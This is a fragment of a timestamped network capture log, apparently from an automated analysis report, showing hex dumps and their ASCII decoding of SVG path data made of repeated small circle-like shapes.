                                                                                                                                                                              2023-09-15 05:27:25 UTC368INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                              Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                              2023-09-15 05:27:25 UTC384INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                              Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                              2023-09-15 05:27:26 UTC433INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                              Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                              2023-09-15 05:27:26 UTC449INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                              Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                              2023-09-15 05:27:26 UTC465INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                              Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                              2023-09-15 05:27:26 UTC481INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                              Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                              2023-09-15 05:27:26 UTC497INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                              Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                              2023-09-15 05:27:26 UTC513INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                              Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                              2023-09-15 05:27:26 UTC529INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                              Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                              2023-09-15 05:27:26 UTC545INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                              Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                              2023-09-15 05:27:26 UTC580INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                              Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                              2023-09-15 05:27:26 UTC596INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                              Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                              2023-09-15 05:27:26 UTC612INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                              Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                              2023-09-15 05:27:26 UTC628INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                              Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                              2023-09-15 05:27:26 UTC644INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                              Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                              2023-09-15 05:27:26 UTC660INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                              Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                              2023-09-15 05:27:26 UTC676INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                              Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
